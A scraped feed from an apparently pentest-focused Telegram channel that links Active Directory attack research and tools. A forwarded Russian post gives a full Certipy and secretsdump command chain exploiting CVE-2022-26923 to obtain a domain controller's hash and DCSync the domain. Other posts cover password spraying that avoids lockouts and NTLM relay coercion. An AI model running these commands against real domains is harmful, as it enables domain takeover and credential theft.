🔐 Exploiting WSUS with MITM for ADCS ESC8 Attack
Discover how attackers abuse misconfigured WSUS servers to escalate privileges through ADCS vulnerabilities. Delve into the intricacies of Windows Server Update Services and the potential risks associated with misconfigurations.
📝 Research:
https://j4s0nmo0n.github.io/belettetimoree.github.io/2023-12-01-WSUS-to-ESC8.html
#ad #adcs #wsus #mitm
Discover how attackers abuse misconfigured WSUS servers to escalate privileges through ADCS vulnerabilities. Delve into the intricacies of Windows Server Update Services and the potential risks associated with misconfigurations.
📝 Research:
https://j4s0nmo0n.github.io/belettetimoree.github.io/2023-12-01-WSUS-to-ESC8.html
#ad #adcs #wsus #mitm
👍8🔥3
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18❤🔥4👍2
This is a custom-developed .NET data collector tool which can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol.
Tool:
🔗 https://github.com/FalconForceTeam/SOAPHound
Research:
🔗 https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/
#ad #windows #bloodhound #soap #adws
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
🔥5❤2👍1
🔐 Spray Passwords, Avoid Lockouts
In this blog post, learn how to effectively use password spraying in Active Directory environments without triggering account lockouts. Dive into authentication mechanisms, password policies, GPO and PSOs.
Research
🔗 https://en.hackndo.com/password-spraying-lockout/
Tool
🔗 https://github.com/login-securite/conpass
#ad #spraying #passpol
In this blog post, learn how to effectively use password spraying in Active Directory environments without triggering account lockouts. Dive into authentication mechanisms, password policies, GPO and PSOs.
Research
🔗 https://en.hackndo.com/password-spraying-lockout/
Tool
🔗 https://github.com/login-securite/conpass
#ad #spraying #passpol
🔥11👍7❤2
Tool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.
🔗 Research:
https://habr.com/ru/companies/angarasecurity/articles/697938/
🔗 Source:
https://github.com/DrunkF0x/ADSpider
———
Наконец-то появилась на свет,
#ad #windows #monitoring #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Паук в Active Directory так лапками тыдык тыдык
В чем соль: у нас уже есть достаточно известные утилиты , чтобы «отслеживать» изменения в Active Directory. Почему в кавычках? Потому что все подобные утилиты (ну, практически) используют...
🔥10❤4👍4👎1
🔑 Three-Headed Potato Dog: NTLM and Kerberos Coercion
New research demonstrates how DCOM can coerce Windows systems to authenticate remotely, allowing attackers to relay NTLM or Kerberos authentication to AD CS over HTTP. This enables remote and cross-session authentication relay attacks, targeting both machine and user accounts.
🔗 Research:
https://blog.compass-security.com/2024/09/three-headed-potato-dog/
🔗 Source:
https://github.com/sploutchy/impacket/blob/potato/examples/potato.py
#ad #windows #dcom #relay #potato
New research demonstrates how DCOM can coerce Windows systems to authenticate remotely, allowing attackers to relay NTLM or Kerberos authentication to AD CS over HTTP. This enables remote and cross-session authentication relay attacks, targeting both machine and user accounts.
🔗 Research:
https://blog.compass-security.com/2024/09/three-headed-potato-dog/
🔗 Source:
https://github.com/sploutchy/impacket/blob/potato/examples/potato.py
#ad #windows #dcom #relay #potato
❤13👍3
📜 DGPOEdit
Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
🔗 Source:
https://github.com/CCob/DGPOEdit
#ad #windows #gpo #policy
Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
🔗 Source:
https://github.com/CCob/DGPOEdit
#ad #windows #gpo #policy
GitHub
GitHub - CCob/DRSAT: Disconnected RSAT - A method of running Group Policy Manager, Certificate Authority and Certificate Templates…
Disconnected RSAT - A method of running Group Policy Manager, Certificate Authority and Certificate Templates MMC snap-ins from non-domain joined machies - CCob/DRSAT
🔥6👍2
🔔Call and Register — Relay Attack on WinReg RPC Client
A critical vulnerability (CVE-2024-43532) has been identified in Microsoft’s Remote Registry client. This flaw allows attackers to exploit insecure fallback mechanisms in the WinReg client, enabling them to relay authentication details and make unauthorized certificate requests through Active Directory Certificate Services (ADCS).
🔗 Research:
https://www.akamai.com/blog/security-research/winreg-relay-vulnerability
🔗 RPC Visibility Tool:
https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit/rpc_visibility
🔗 PoC:
https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532
#ad #adcs #rpc #ntlm #relay #etw #advapi
A critical vulnerability (CVE-2024-43532) has been identified in Microsoft’s Remote Registry client. This flaw allows attackers to exploit insecure fallback mechanisms in the WinReg client, enabling them to relay authentication details and make unauthorized certificate requests through Active Directory Certificate Services (ADCS).
🔗 Research:
https://www.akamai.com/blog/security-research/winreg-relay-vulnerability
🔗 RPC Visibility Tool:
https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit/rpc_visibility
🔗 PoC:
https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532
#ad #adcs #rpc #ntlm #relay #etw #advapi
1🔥9👍6❤2
📜 ADCS Attack Techniques Cheatsheet
This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)
🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0
#ad #adcs #esc #cheatsheet
This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)
🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0
#ad #adcs #esc #cheatsheet
Google Docs
ADCS Attack Techniques Cheatsheet
👍17🔥3